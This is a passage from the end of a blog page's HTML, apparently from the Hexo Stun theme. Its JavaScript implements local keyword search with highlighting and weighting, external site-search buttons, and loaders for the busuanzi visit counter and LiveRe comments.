          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script><script>function loadLivere () {
  var d = document, s = d.createElement('script');

  if (!d.getElementById('lv-container')) {
    return;
  }
  if (typeof LivereTower === 'function') {
    return;
  }
  s.src = 'https://cdn-city.livere.com/js/embed.dist.js';
  if (false) {
    s.setAttribute('data-pjax-rm', '');
  }
  (d.head || d.body).appendChild(s);
}

if (false) {
  loadLivere();
} else {
  window.addEventListener('DOMContentLoaded', loadLivere, false);
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script></body></html>